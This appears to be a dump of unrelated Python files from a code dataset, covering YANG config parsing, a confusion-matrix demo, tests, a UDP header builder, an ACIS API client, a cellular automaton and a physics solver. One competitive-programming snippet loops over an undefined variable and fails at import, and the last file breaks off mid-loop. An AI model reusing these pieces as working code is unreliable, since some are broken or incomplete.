for logFunc in self._log('reag-tag-values-unexpected-tag-begin').errorFunc(): logFunc('got unexpected tag-value. expected: (%s, %s, type=%s), got: (%s, %s, type=%s)',
"link", "http://qwilt.com/ns/yang/device/tech/qwilt-tech-interfaces", Value.kXmlBegin,
tag, ns, valBegin.getType())
self._clearAllReadData()
return ReturnCodes.kGeneralError
res = self.linkObj._readTagValues(tagValueList, readAllOrFail)
if res != ReturnCodes.kOk:
for logFunc in self._log('read-tag-values-link-failed').errorFunc(): logFunc('linkObj._readTagValues() failed. tagValueList=%s', tagValueList)
if readAllOrFail:
self._clearAllReadData()
return ReturnCodes.kGeneralError
((tag, ns), valEnd) = tagValueList.popFront()
if (tag != "link") or \
(ns != "http://qwilt.com/ns/yang/device/tech/qwilt-tech-interfaces") or \
(valEnd.getType() != Value.kXmlEnd):
for logFunc in self._log('reag-tag-values-unexpected-tag-end').errorFunc(): logFunc('got unexpected tag-value. expected: (%s, %s, type=%s), got: (%s, %s, type=%s)',
"link", "http://qwilt.com/ns/yang/device/tech/qwilt-tech-interfaces", Value.kXmlEnd,
tag, ns, valEnd.getType())
self._clearAllReadData()
return ReturnCodes.kGeneralError
if self.deviceObj:
((tag, ns), valBegin) = tagValueList.popFront()
if (tag != "device") or \
(ns != "http://qwilt.com/ns/yang/device/tech/qwilt-tech-interfaces") or \
(valBegin.getType() != Value.kXmlBegin):
for logFunc in self._log('reag-tag-values-unexpected-tag-begin').errorFunc(): logFunc('got unexpected tag-value. expected: (%s, %s, type=%s), got: (%s, %s, type=%s)',
"device", "http://qwilt.com/ns/yang/device/tech/qwilt-tech-interfaces", Value.kXmlBegin,
tag, ns, valBegin.getType())
self._clearAllReadData()
return ReturnCodes.kGeneralError
res = self.deviceObj._readTagValues(tagValueList, readAllOrFail)
if res != ReturnCodes.kOk:
for logFunc in self._log('read-tag-values-device-failed').errorFunc(): logFunc('deviceObj._readTagValues() failed. tagValueList=%s', tagValueList)
if readAllOrFail:
self._clearAllReadData()
return ReturnCodes.kGeneralError
((tag, ns), valEnd) = tagValueList.popFront()
if (tag != "device") or \
(ns != "http://qwilt.com/ns/yang/device/tech/qwilt-tech-interfaces") or \
(valEnd.getType() != Value.kXmlEnd):
for logFunc in self._log('reag-tag-values-unexpected-tag-end').errorFunc(): logFunc('got unexpected tag-value. expected: (%s, %s, type=%s), got: (%s, %s, type=%s)',
"device", "http://qwilt.com/ns/yang/device/tech/qwilt-tech-interfaces", Value.kXmlEnd,
tag, ns, valEnd.getType())
self._clearAllReadData()
return ReturnCodes.kGeneralError
for logFunc in self._log('read-tag-values-done').debug3Func(): logFunc('done. readAllOrFail=%s, tagValueList=%s', readAllOrFail, tagValueList)
return ReturnCodes.kOk
"""
Extracted from the below data:
{
"node": {
"name": "systemDefaults",
"namespace": "system_defaults",
"className": "SystemDefaultsMaapi",
"importStatement": "from a.api.yang.modules.tech.common.qwilt_tech_interfaces.tech.interfaces.interface.system_defaults.system_defaults_maapi_gen import SystemDefaultsMaapi",
"baseClassName": "SystemDefaultsMaapiBase",
"baseModule": "system_defaults_maapi_base_gen"
},
"ancestors": [
{
"moduleYangNamespacePrefix": "qt",
"yangName": "tech",
"namespace": "tech",
"isCurrent": false,
"isList": false,
"moduleYangNamespace": "http://qwilt.com/ns/yang/device/tech/qwilt-tech",
"name": "tech"
},
{
"moduleYangNamespacePrefix": "qt-if",
"yangName": "interfaces",
"namespace": "interfaces",
"isCurrent": false,
"isList": false,
"moduleYangNamespace": "http://qwilt.com/ns/yang/device/tech/qwilt-tech-interfaces",
"name": "interfaces"
},
{
"moduleYangNamespacePrefix": "qt-if",
"isCurrent": false,
"yangName": "interface",
"namespace": "interface",
"isList": true,
"moduleYangNamespace": "http://qwilt.com/ns/yang/device/tech/qwilt-tech-interfaces",
"keyLeaf": {
"varName": "interface",
"defaultVal": null,
"typeHandler": "handler: StringHandler"
},
"name": "interface"
},
{
"moduleYangNamespacePrefix": "qt-if",
"yangName": "system-defaults",
"namespace": "system_defaults",
"isCurrent": true,
"isList": false,
"moduleYangNamespace": "http://qwilt.com/ns/yang/device/tech/qwilt-tech-interfaces",
"name": "system-defaults"
}
],
"descendants": [
{
"moduleYangNamespacePrefix": "qt-if",
"memberName": "content",
"yangName": "content",
"className": "BlinkyContentMaapi",
"importStatement": "from a.api.yang.modules.tech.common.qwilt_tech_interfaces.tech.interfaces.interface.system_defaults.content.content_maapi_gen import BlinkyContentMaapi",
"isList": false,
"moduleYangNamespace": "http://qwilt.com/ns/yang/device/tech/qwilt-tech-interfaces"
},
{
"moduleYangNamespacePrefix": "qt-if",
"memberName": "connectivityCheck",
"yangName": "connectivity-check",
"className": "BlinkyConnectivityCheckMaapi",
"importStatement": "from a.api.yang.modules.tech.common.qwilt_tech_interfaces.tech.interfaces.interface.system_defaults.connectivity_check.connectivity_check_maapi_gen import BlinkyConnectivityCheckMaapi",
"isList": false,
"moduleYangNamespace": "http://qwilt.com/ns/yang/device/tech/qwilt-tech-interfaces"
},
{
"moduleYangNamespacePrefix": "qt-if",
"memberName": "management",
"yangName": "management",
"className": "BlinkyManagementMaapi",
"importStatement": "from a.api.yang.modules.tech.common.qwilt_tech_interfaces.tech.interfaces.interface.system_defaults.management.management_maapi_gen import BlinkyManagementMaapi",
"isList": false,
"moduleYangNamespace": "http://qwilt.com/ns/yang/device/tech/qwilt-tech-interfaces"
},
{
"moduleYangNamespacePrefix": "qt-if",
"memberName": "link",
"yangName": "link",
"className": "BlinkyLinkMaapi",
"importStatement": "from a.api.yang.modules.tech.common.qwilt_tech_interfaces.tech.interfaces.interface.system_defaults.link.link_maapi_gen import BlinkyLinkMaapi",
"isList": false,
"moduleYangNamespace": "http://qwilt.com/ns/yang/device/tech/qwilt-tech-interfaces"
},
{
"moduleYangNamespacePrefix": "qt-if",
"memberName": "device",
"yangName": "device",
"className": "BlinkyDeviceMaapi",
"importStatement": "from a.api.yang.modules.tech.common.qwilt_tech_interfaces.tech.interfaces.interface.system_defaults.device.device_maapi_gen import BlinkyDeviceMaapi",
"isList": false,
"moduleYangNamespace": "http://qwilt.com/ns/yang/device/tech/qwilt-tech-interfaces"
}
],
"conditionalDebugName": null,
"operLeaves": [],
"module": {},
"configLeaves": [
{
"moduleYangNamespace": "http://qwilt.com/ns/yang/device/tech/qwilt-tech-interfaces",
"moduleYangNamespacePrefix": "qt-if",
"typeHandler": "handler: IntHandler",
"memberName": "configurationDelay",
"yangName": "configuration-delay",
"object": "",
"leafrefPath": null,
"defaultVal": "0",
"hasDefaultRef": false
},
{
"moduleYangNamespace": "http://qwilt.com/ns/yang/device/tech/qwilt-tech-interfaces",
"moduleYangNamespacePrefix": "qt-if",
"typeHandler": "handler: BoolPyHandler",
"memberName": "muteReporting",
"yangName": "mute-reporting",
"object": "",
"leafrefPath": null,
"defaultVal": "false",
"hasDefaultRef": false
},
{
"moduleYangNamespace": "http://qwilt.com/ns/yang/device/tech/qwilt-tech-interfaces",
"moduleYangNamespacePrefix": "qt-if",
"typeHandler": "handler: BoolPyHandler",
"memberName": "sendGratuitousArp",
"yangName": "send-gratuitous-arp",
"object": "",
"leafrefPath": null,
"defaultVal": "true",
"hasDefaultRef": false
},
{
"moduleYangNamespace": "http://qwilt.com/ns/yang/device/tech/qwilt-tech-interfaces",
"moduleYangNamespacePrefix": "qt-if",
"typeHandler": "handler: BoolPyHandler",
"memberName": "shutdown",
"yangName": "shutdown",
"object": "",
"leafrefPath": null,
"defaultVal": "true",
"hasDefaultRef": false
},
{
"moduleYangNamespace": "http://qwilt.com/ns/yang/device/tech/qwilt-tech-interfaces",
"moduleYangNamespacePrefix": "qt-if",
"typeHandler": "handler: BoolPyHandler",
"memberName": "techMode",
"yangName": "tech-mode",
"object": "",
"leafrefPath": null,
"defaultVal": "false",
"hasDefaultRef": false
}
],
"env": {
"namespaces": [
"a",
"api",
"yang",
"modules",
"tech",
"common",
"qwilt_tech_interfaces"
]
},
"leaves": [
{
"moduleYangNamespace": "http://qwilt.com/ns/yang/device/tech/qwilt-tech-interfaces",
"moduleYangNamespacePrefix": "qt-if",
"typeHandler": "handler: IntHandler",
"memberName": "configurationDelay",
"yangName": "configuration-delay",
"object": "",
"leafrefPath": null,
"defaultVal": "0",
"hasDefaultRef": false
},
{
"moduleYangNamespace": "http://qwilt.com/ns/yang/device/tech/qwilt-tech-interfaces",
"moduleYangNamespacePrefix": "qt-if",
"typeHandler": "handler: BoolPyHandler",
"memberName": "muteReporting",
"yangName": "mute-reporting",
"object": "",
"leafrefPath": null,
"defaultVal": "false",
"hasDefaultRef": false
},
{
"moduleYangNamespace": "http://qwilt.com/ns/yang/device/tech/qwilt-tech-interfaces",
"moduleYangNamespacePrefix": "qt-if",
"typeHandler": "handler: BoolPyHandler",
"memberName": "sendGratuitousArp",
"yangName": "send-gratuitous-arp",
"object": "",
"leafrefPath": null,
"defaultVal": "true",
"hasDefaultRef": false
},
{
"moduleYangNamespace": "http://qwilt.com/ns/yang/device/tech/qwilt-tech-interfaces",
"moduleYangNamespacePrefix": "qt-if",
"typeHandler": "handler: BoolPyHandler",
"memberName": "shutdown",
"yangName": "shutdown",
"object": "",
"leafrefPath": null,
"defaultVal": "true",
"hasDefaultRef": false
},
{
"moduleYangNamespace": "http://qwilt.com/ns/yang/device/tech/qwilt-tech-interfaces",
"moduleYangNamespacePrefix": "qt-if",
"typeHandler": "handler: BoolPyHandler",
"memberName": "techMode",
"yangName": "tech-mode",
"object": "",
"leafrefPath": null,
"defaultVal": "false",
"hasDefaultRef": false
}
],
"createTime": "2013"
}
"""
|
15,182 | 4e306e9710c605d03320a465a8a6a3d77f510295 | import numpy as np
import matplotlib.pyplot as plt
from sklearn.metrics import confusion_matrix
from sklearn.metrics import classification_report
# Define sample labels (5 classes, labelled 0..4)
true_labels = [2, 0, 0, 2, 4, 4, 1, 0, 3, 3, 3]
pred_labels = [2, 1, 0, 2, 4, 3, 1, 0, 1, 3, 3]

# Create confusion matrix (rows = true class, columns = predicted class)
confusion_mat = confusion_matrix(true_labels, pred_labels)

# Visualize confusion matrix as a grayscale heat map
plt.imshow(confusion_mat, interpolation='nearest', cmap=plt.cm.gray)
plt.title('Confusion matrix')
plt.colorbar()
ticks = np.arange(5)  # one tick per class
plt.xticks(ticks, ticks)
plt.yticks(ticks, ticks)
plt.ylabel('True labels')
plt.xlabel('Predicted labels')
plt.show()

# Classification report: per-class precision / recall / f1-score
targets = ['Class-0', 'Class-1', 'Class-2', 'Class-3', 'Class-4']
print('\n', classification_report(true_labels, pred_labels, target_names=targets))
|
15,183 | 253437a16ef4d460ac7e9e7134cf1c78afd47f6f | """
Integration Tests
"""
from unittest import TestCase
from unittest.mock import MagicMock
from inventory_management.inventory import Inventory
from inventory_management.furniture import Furniture
from inventory_management.electric_appliances import ElectricAppliances
from inventory_management.market_prices import get_latest_price
class ModuleTests(TestCase):
    """Integration tests exercising the inventory classes together."""

    def test_module(self):
        """Create one of each inventory type and verify attribute access,
        the return_as_dictionary() round-trip, and the price lookup."""
        rug = Inventory(7, "oriental_rug", 30, 5)
        rug_info = rug.return_as_dictionary()
        sofa = Furniture(5, "brown_sofa", 100, 20, "leather", "large")
        sofa_info = sofa.return_as_dictionary()
        tv = ElectricAppliances(6, "4k_tv", 2000, 50, "Panasonic", 220)
        tv_info = tv.return_as_dictionary()
        # NOTE(review): result unused — presumably kept just to exercise
        # the call path; confirm.
        price = get_latest_price(8)
        self.assertEqual(7, rug.product_code)
        self.assertEqual("oriental_rug", rug_info["description"])
        self.assertEqual("brown_sofa", sofa.description)
        self.assertEqual(100, sofa_info["market_price"])
        self.assertEqual(2000, tv.market_price)
        self.assertEqual(50, tv_info["rental_price"])
        # assumes market_prices.get_latest_price always returns 24 — TODO confirm
        self.assertEqual(24, get_latest_price(1))
|
15,184 | f9199ba008630a84d7204dff9a657597a05626ae | from collections import defaultdict, deque, Counter
import sys
from decimal import *
from heapq import heapify, heappop, heappush
import math
import random
import string
from copy import deepcopy
from itertools import combinations, permutations, product
from operator import mul, itemgetter
from functools import reduce, lru_cache
from bisect import bisect_left, bisect_right
def input():
    # Deliberately shadows the builtin: fast stdin reads for competitive
    # programming; strips the trailing newline (and trailing whitespace).
    return sys.stdin.readline().rstrip()
def getN():
    # Read one line as a single integer.
    return int(input())
def getNM():
    # Read one line of space-separated integers; returns a map object
    # (intended for tuple unpacking at the call site).
    return map(int, input().split())
def getList():
    # Read one line of space-separated integers as a list.
    return list(map(int, input().split()))
def getArray(intn):
    # Read intn lines, one integer per line.
    return [int(input()) for i in range(intn)]
sys.setrecursionlimit(1000000000)
mod = 10 ** 9 + 7
INF = float('inf')
dx = [1, 0, -1, 0]
dy = [0, 1, 0, -1]
#############
# Main Code #
#############
# 1 ~ nまでに各桁のフラグが何本立つか計算する関数
def bitflag(n, flaglist):
    """Accumulate per-bit set counts over the range 0..n.

    After the call, flaglist[i] has been increased by the number of
    integers in [0, n] whose bit (i - 1) is set, for i in 1..60.
    No-op when n <= 0.
    """
    if n <= 0:
        return
    for bit in range(1, 61):
        period = 1 << bit        # the bit pattern repeats with this period
        half = period >> 1       # within each period, the bit is set `half` times
        full_cycles = (n // period) * half
        # Count of set positions inside the final, partial period.
        partial = n % period + 1 - half
        flaglist[bit] += full_cycles + (partial if partial > 0 else 0)
# l[i][0] / l[i][1]: how many processed inputs have bit i clear / set.
l = [[0, 0] for i in range(61)]

# Tally, for each of the 61 bit positions, whether n has that bit set.
def splitbit(n):
    for i in range(61):
        if n & (1 << i):
            l[i][1] += 1
        else:
            l[i][0] += 1

# NOTE(review): `A` is never defined in this file, so this loop raises
# NameError at import time — looks like leftover template code.
for i in A:
    splitbit(i)
# ABC126 F - XOR Matching
# In 0 .. 2^M - 1 each bit position is set 2^(M-1) times, so the XOR of
# all those values is 0 (for M >= 2). Listing every value except K once
# on each side of a central K makes every equal pair cancel to K.
M, K = getNM()

if M == 1:
    # Only 0 and 1 exist; a valid arrangement exists just for K == 0.
    if K == 0:
        print(0, 1, 1, 0)
    else:
        print(-1)
    exit()

if K >= 2 ** M:
    # K has a bit outside the representable range: impossible.
    print(-1)
    exit()

res = [i for i in range(1 << M) if i != K]
# Mirror layout: K, values, K, values reversed.
res = [K] + res + [K] + res[::-1]
print(*res)
|
15,185 | f529029625ce29f7217ca13cdc133b071b25f20d | import requests
import numpy as np
from io import BytesIO
class Dataset(object):
    """Wrapper around a remote .npz dataset fetched through a project API."""

    def __init__(self, mvshlf_api, project_id):
        # API client and the project whose datasets are queried.
        self.mvshlf_api = mvshlf_api
        self.project_id = project_id

    def load_data(self, url=None):
        """Download the dataset archive and load it with numpy.

        When url is None, the download URI of the project's first
        dataset (as returned by the API) is used. The payload is
        expected to be an .npz archive.
        """
        if url is None:
            dataset = self.mvshlf_api.getProjectDatasets(self.project_id)
            url = dataset[0]['downloadUri']
        r = requests.get(url, stream=True)
        # Read the raw stream fully into memory, then hand it to np.load.
        self.data = np.load(BytesIO(r.raw.read()))

    def get_training_set(self):
        # (patterns, classes) arrays for training.
        return (self.data['train_patterns'], self.data['train_classes'])

    def get_test_set(self):
        # (patterns, classes) arrays for testing.
        return (self.data['test_patterns'], self.data['test_classes'])

    def get_test_ids(self):
        # Identifiers for the test samples.
        return self.data['test_ids']

    def get_labels(self):
        # Class label names.
        return self.data['class_labels']
15,186 | fc98eb8a48022b79fea79e4a4f98ba78b9b93a8f | import sp_cal_bandwidth
import sp_cal_betweenness
import sp_cal_coverage
import sp_cal_dij_delay
def get_parameters(path):
    """Get the parameters of mega-constellations.

    The first line of the file holds comma-separated column headers;
    subsequent lines hold numeric values for those columns.

    :param path: str, configuration file path of mega-constellations
    :return: 6-row two-dimensional list; row 0 keeps the header strings,
        later rows are filled with floats (rows not present in the file
        stay 0).
    """
    # BUG FIX: the file handle was opened without a context manager and
    # leaked on any parse error; `with` guarantees it is closed.
    with open(path, "r") as f:
        lines = f.read().split('\n')
    # The original readline() loop stopped at EOF, so it never saw the
    # empty string produced after a trailing newline — drop it.
    if lines and lines[-1] == '':
        lines.pop()
    first = lines[0] if lines else ''
    n_cols = len(first.split(','))
    parameter = [[0] * n_cols for _ in range(6)]
    for row, line in enumerate(lines):
        for col, value in enumerate(line.split(',')):
            # Header row keeps the raw strings; data rows are floats.
            parameter[row][col] = value if row == 0 else float(value)
    return parameter
def perform_benchmark():
    """Run the benchmark suite over the constellations in parameter.txt:
    Dijkstra delay, bandwidth, coverage and betweenness."""
    path = 'parameter.txt'
    constellation_parameter = get_parameters(path)
    # Each sp_cal_* module consumes the same parameter table.
    sp_cal_dij_delay.dij_delay(constellation_parameter, error_rate=0, dT=1)
    sp_cal_bandwidth.bandwidth(constellation_parameter, dT=60)
    sp_cal_coverage.coverage(constellation_parameter)
    sp_cal_betweenness.betweenness(constellation_parameter)
if __name__ == '__main__':
perform_benchmark()
|
15,187 | ae50437a62e872cc54f9b3b0d80b0ade528f8496 | """
PACKNET - c0mplh4cks
UDP
.---.--------------.
| 7 | Application |
|---|--------------|
| 6 | Presentation |
|---|--------------|
| 5 | Session |
#===#==============#
# 4 # Transport #
#===#==============#
| 3 | Network |
|---|--------------|
| 2 | Data Link |
|---|--------------|
| 1 | Physical |
'---'--------------'
"""
# === Importing Dependencies === #
from struct import pack, unpack
from .standards import encode, decode, checksum
# === UDP Header === #
class Header:
    """UDP header (layer 4): build a datagram from fields or parse one."""

    def __init__(self, packet=b""):
        self.packet = packet      # raw bytes of the datagram
        self.src = ["", 0, ""]    # sender [ip, port, mac]
        self.dst = ["", 0, ""]    # receiver [ip, port, mac]
        self.length = 0           # total length (8-byte header + data)
        self.checksum = 0
        self.data = b""           # payload bytes

    def build(self):
        """Assemble self.packet from the current fields; returns the bytes.

        The checksum covers the header fields plus the IPv4 pseudo-header
        (source ip, destination ip, protocol 17, total length).
        """
        packet = []

        self.length = 8 + len(self.data)  # UDP header is a fixed 8 bytes

        packet.insert(0, pack( ">H", self.src[1] ))     # Source PORT
        packet.insert(1, pack( ">H", self.dst[1] ))     # Target PORT
        packet.insert(2, pack( ">H", self.length ))     # Total length
        packet.insert(4, self.data )                    # Data
        packet.insert(3, checksum( [                    # Checksum
            *packet,
            encode.ip( self.src[0] ),
            encode.ip( self.dst[0] ),
            pack( ">H", 17 ),                           # IP protocol number for UDP
            pack( ">H", self.length )
        ] ))

        self.packet = b"".join(packet)

        return self.packet

    def read(self):
        """Parse self.packet into the header fields; returns bytes consumed."""
        packet = self.packet
        i = 0

        i, self.src[1] = i+2, unpack( ">H", packet[i:i+2] )[0]    # Source PORT
        i, self.dst[1] = i+2, unpack( ">H", packet[i:i+2] )[0]    # Target PORT
        i, length = i+2, unpack( ">H", packet[i:i+2] )[0]         # Total length
        i, self.checksum = i+2, unpack( ">H", packet[i:i+2] )[0]  # Checksum
        i, self.data = i+len( packet[i:] ), packet[i:]            # Data

        # NOTE(review): the length field parsed above is discarded and
        # self.length is set to the number of bytes consumed instead —
        # confirm this is intentional.
        self.length = i

        return i
|
15,188 | f0db1e4b6b1c6b35d6e9ae1a348a9de55dd122d5 | #----------------------------------------------------------------------------
#
# Copyright (c) 2013-14, Enthought, Inc.
# All rights reserved.
#
# This software is provided without warranty under the terms of the BSD
# license included in /LICENSE.txt and may be redistributed only
# under the conditions described in the aforementioned license. The license
# is also available online at http://www.enthought.com/licenses/BSD.txt
#
# Thanks for using Enthought open source!
#
#----------------------------------------------------------------------------
import unittest
from enable.api import Component
from traits.api import HasTraits, Instance
from traits_enaml.testing.enaml_test_assistant import EnamlTestAssistant
class Model(HasTraits):
    """Minimal traits model holding the Component rendered on the canvas."""
    component = Instance(Component)
class EnableCanvasTestCase(EnamlTestAssistant, unittest.TestCase):
    """Tests for the EnableCanvas enaml widget bound to a traits model."""

    def setUp(self):
        EnamlTestAssistant.setUp(self)

        # Inline enaml view: a window whose canvas component tracks
        # model.component via the << subscription operator.
        enaml_source = """
from enaml.widgets.api import MainWindow
from traits_enaml.widgets.enable_canvas import EnableCanvas

enamldef MainView(MainWindow):
    attr model
    EnableCanvas:
        name = 'canvas'
        component << model.component
"""
        self.component = Component()
        self.model = Model(component=self.component)
        view, toolkit_view = self.parse_and_create(
            enaml_source, model=self.model
        )
        self.view = view

    def tearDown(self):
        # Drop references so widgets can be garbage-collected between tests.
        self.component = None
        self.view = None
        self.model = None
        EnamlTestAssistant.tearDown(self)

    def test_using_enable_canvas_widget(self):
        """Changing model.component must propagate to the canvas."""
        canvas = self.view.find('canvas')
        with self.assertAtomChanges(canvas, 'component'):
            self.model.component = Component()
        canvas = None

    def test_enable_canvas_proxy(self):
        from enaml.qt.qt_raw_widget import QtRawWidget
        canvas = self.view.find('canvas')
        # Check that the proxy is strictly a QtRawWidget (not a subclass).
        self.assertEqual(type(canvas.proxy), QtRawWidget)
|
15,189 | de308153762869c271eb0b07f30cf012592f58d7 | __author__ = 'am004929'
|
15,190 | c1301d84f1cc43350872c182bde6440e5bc35a68 | import re, urllib, urllib2, json
def jsonloads(string):
    """Parse a JSON string, supporting both the modern json module
    (loads) and the legacy python-json module (read)."""
    loader = getattr(json, 'loads', None)
    if loader is not None:
        return loader(string)
    return json.read(string)
def jsondumps(dict):
    """Serialize to a JSON string, supporting both the modern json
    module (dumps) and the legacy python-json module (write).

    Note: the parameter name shadows the builtin `dict`; kept for
    backward compatibility with keyword callers.
    """
    if hasattr(json, 'dumps'):
        return json.dumps(dict)
    return json.write(dict)
def date_format(date):
    """Normalize a date string to 'YYYY-MM-DD'.

    Separators (-, _, ., :, space) are stripped first, then the first
    eight remaining characters are re-split as year/month/day.
    """
    digits = re.sub(r'[-_\.: ]+', '', date)
    return '-'.join((digits[0:4], digits[4:6], digits[6:8]))
def call(method, dict):
    """POST a request to the ACIS web service and decode the JSON reply.

    (Python 2 only: uses urllib/urllib2.)

    :param method: service endpoint name appended to the base URL
    :param dict: request parameters, JSON-encoded into the 'params' field
    :return: decoded JSON response
    """
    params = urllib.urlencode({'params':jsondumps(dict)})
    req = urllib2.Request('http://data.rcc-acis.org/%s' % method, params, {'Accept':'application/json'})
    res = urllib2.urlopen(req)
    x = res.read();
    return jsonloads(x)
def contains(string, substring):
    """Return True when substring occurs anywhere in string."""
    return substring in string
def build_elem(name):
    """Translate a prefixed element name into an ACIS element dict.

    Recognized prefixes: 'normal_' sets the normal flag, 'ytd_' requests
    a year-to-date sum; any remaining underscores are stripped from the
    bare element name.
    """
    elem = {}
    while '_' in name:
        if 'normal_' in name:
            name = name.replace('normal_', '')
            elem['normal'] = '1'
        elif 'ytd_' in name:
            name = name.replace('ytd_', '')
            elem['duration'] = 'ytd'
            elem['reduce'] = 'sum'
        else:
            name = name.replace('_', '')
    elem['name'] = name
    return elem
def build_elem_list(elemstrings):
    """Build a list of ACIS element dicts from element strings.

    A string containing '{' is parsed as a Python dict literal; any
    other string is expanded through build_elem().

    :param elemstrings: iterable of element names or dict literals
    :return: list of element dicts
    """
    import ast  # local import keeps module-level dependencies unchanged
    elems = []
    for arg in elemstrings:
        if re.search(r'\{', arg):
            # SECURITY FIX: this used eval(), which executes arbitrary
            # code from the input string; literal_eval accepts only
            # Python literals.
            elems.append(ast.literal_eval(arg))
        else:
            elems.append(build_elem(arg))
    return elems
|
15,191 | af43b4731f5e08208832be1bb1f6ee7f7ce6a0b1 | # -*- coding: utf-8 -*-
"""
Created on
@author: luolei
"""
import numpy as np
import seaborn as sns
import matplotlib.pyplot as plt
import copy
class Cell(object):
    """
    A single cell of the cellular automaton.
    """
    def __init__(self, center=np.array([0, 0]), state='dead'):
        """
        Initialize the cell.
        :param center: grid coordinates [row, col] of this cell
        :param state: 'dead', 'alive', or 'not exist' (off-grid sentinel)
        """
        self.center = center
        self.state = state
        self.neighbors = dict()

    def get_neighbors(self, cells, pool_size):
        """
        Collect this cell's four von-Neumann neighbours (up/down/left/right).
        :param cells: nested dict of all cells, cells[i][j] -> Cell
        :param pool_size: [rows, cols] grid dimensions
        :return: None; stored in self.neighbors[axis][offset]
        """
        neighbors = dict()
        for direc in [0, 1]:  # axis: 0 = row, 1 = column
            neighbors[direc] = dict()
            for delta_loc in [-1, 1]:  # offset along that axis
                neighbor_loc = copy.deepcopy(self.center)
                neighbor_loc[direc] = neighbor_loc[direc] + delta_loc
                # Off-grid neighbours are represented by a sentinel cell.
                if (neighbor_loc[direc] < 0) | (neighbor_loc[direc] > pool_size[direc] - 1):
                    neighbors[direc][delta_loc] = Cell(center=np.array([-1, -1]),
                                                       state='not exist')
                else:
                    neighbors[direc][delta_loc] = cells[neighbor_loc[0]][neighbor_loc[1]]
        self.neighbors = neighbors

    def show_neighbors_states(self):
        """
        Print the states of the four neighbours (debug helper).
        :return: None
        """
        print([self.neighbors[0][-1].state,
               self.neighbors[0][1].state,
               self.neighbors[1][-1].state,
               self.neighbors[1][1].state])

    def update_state(self):
        """Update self.state from the live-neighbour count: exactly one
        live neighbour -> 'alive'; zero or two-plus -> 'dead'.
        (A 4-neighbourhood rule — not Conway's Game of Life.)"""
        alive_num = 0
        for direc in [0, 1]:
            for delta_loc in [-1, 1]:
                if self.neighbors[direc][delta_loc].state == 'alive':
                    alive_num += 1
        self.alive_neighbors_num = alive_num

        if (self.alive_neighbors_num >= 2):
            self.state = 'dead'
        elif (self.alive_neighbors_num >= 1) & (self.alive_neighbors_num < 2):
            self.state = 'alive'
        elif self.alive_neighbors_num < 1:
            self.state = 'dead'
class Pool(object):
    """
    Cellular-automaton environment: a 2-D grid of Cell objects.
    """
    def __init__(self, pool_size=np.array([10, 10])):
        """
        Initialize the pool with every cell dead.
        :param pool_size: [rows, cols] grid dimensions
        """
        self.pool_size = pool_size
        # Grid stored as nested dicts: cells[i][j] -> Cell.
        self.cells = dict()
        for i in range(self.pool_size[0]):
            self.cells[i] = dict()
            for j in range(self.pool_size[1]):
                self.cells[i][j] = Cell(center=np.array([i, j]), state='dead')

    def init_alive_cells(self, init_alive_cell_locs):
        """
        Mark the given locations as alive.
        :param init_alive_cell_locs: iterable of [row, col] pairs
        :return: None
        """
        for loc in init_alive_cell_locs:
            self.cells[loc[0]][loc[1]] = Cell(center=np.array(loc), state='alive')

    def update_cells_states(self):
        """
        Advance the automaton one generation (synchronous update).
        :return: None
        """
        # Snapshot pass: rebuild each cell and attach neighbours taken
        # from the previous generation, so no update sees a half-new grid.
        new_cells = dict()
        for i in range(self.pool_size[0]):
            new_cells[i] = dict()
            for j in range(self.pool_size[1]):
                cell = Cell(center=np.array([i, j]), state=self.cells[i][j].state)
                cell.get_neighbors(self.cells, self.pool_size)
                new_cells[i][j] = cell

        # Transition pass: apply the rule to every snapshot cell.
        for i in range(self.pool_size[0]):
            for j in range(self.pool_size[1]):
                cell = new_cells[i][j]
                cell.update_state()
                new_cells[i][j] = cell

        self.cells = new_cells

    def run_simulation(self, steps=5, show_plot=False):
        """
        Run the automaton for a number of generations, optionally animating.
        :param steps: number of generations to simulate
        :param show_plot: when True, draw the grid with matplotlib
        :return: None
        """
        if show_plot == True:
            plt.figure(figsize=[6, 6])
            sns.set_style('darkgrid')

        for step in range(steps):
            self.update_cells_states()

            if show_plot == True:
                cells_locs = []
                colors_list = []
                for i in range(self.pool_size[0]):
                    for j in range(self.pool_size[1]):
                        cells_locs.append([i, j])
                        # Alive cells drawn white, dead cells black.
                        if self.cells[i][j].state == 'alive':
                            colors_list.append('w')
                        else:
                            colors_list.append('k')

                plt.clf()
                plt.scatter([p[0] for p in cells_locs],
                            [p[1] for p in cells_locs],
                            c=colors_list,
                            marker='s',
                            s=60,
                            edgecolors='k')
                # BUG FIX: plt.hold(True) used to be called here, but
                # pyplot.hold was removed in matplotlib 3.0 and raises
                # AttributeError; hold-on is the default behaviour and
                # plt.clf() above already clears each frame.
                plt.legend(['step = %s' % step])
                plt.tight_layout()
                plt.show()
                plt.pause(0.1)
if __name__ == '__main__':
    # NOTE(review): this rebinding shadows the Pool class with an
    # instance; harmless here because the class is not used afterwards.
    Pool = Pool(pool_size=np.array([100, 100]))
    init_alive_cell_locs = [[50, 51],
                            [51, 51],
                            [52, 51],
                            [51, 52],
                            [51, 50],
                            [50, 52],
                            [52, 50]]
    Pool.init_alive_cells(init_alive_cell_locs)
    # 500 animated generations; blocks on the matplotlib window.
    Pool.run_simulation(steps=500, show_plot=True)
    # Debug inspection of one cell after the run.
    cell = Pool.cells[3][4]
    cell.get_neighbors(Pool.cells, Pool.pool_size)
    cell.show_neighbors_states()
    cell.update_state()
15,192 | cef2ab5c13f31d6f8278d04fa96a018fa16bf3b0 | ####################################################################################
###
### Program to find eigenenergies of the infinite square well.
###
####################################################################################
# Importing useful stuff
from numpy import *
from matplotlib.pyplot import *
import scipy.integrate
import numpy as np
import matplotlib.pyplot as plt
# Defining potential
def infinite_well(z):
    """Infinite square well potential: zero everywhere inside the box.

    :param z: position array (only its length is used)
    :return: numpy array of zeros, one entry per position
    """
    return zeros(len(z))
# Constants and parameters
N = 500 # number of points
z = np.linspace(0,1,N) # position array
dz = z[1]-z[0] # step length
tol = 0.1 # tolerance level
W = infinite_well(z) # getting potential
a = 0.4 # width of well [nm]
hbarc = 197.3 # eV nm
mc2 = 0.511*10**6 # eV
Psi = np.zeros(N) # wave function
Psi[0] = 0 # initial condition (function must die in endpoints)
Psi[1] = 0.1 # initial condition
epsilon = [] # list to be filled with epsilon
epsilon_anal = [] # analtyic energy list to be filled
E_n = [] # analytical energies
E = [] # numerical energies
lastpsi = [] # value of last psi
Psi_list = [] # list to store the best Psi
epsilon_trial = 9 # trial eigenvalue
# For plotting numerical solutions with index
number = 0 # in use when labelling wavefunctions in plot
colors = 'cmygbcmygb' # for different colors in plot
color_index = 0
# Search for correct eigenvalue
while epsilon_trial < 160:
# Calculating wave function
for j in range(1,N-1):
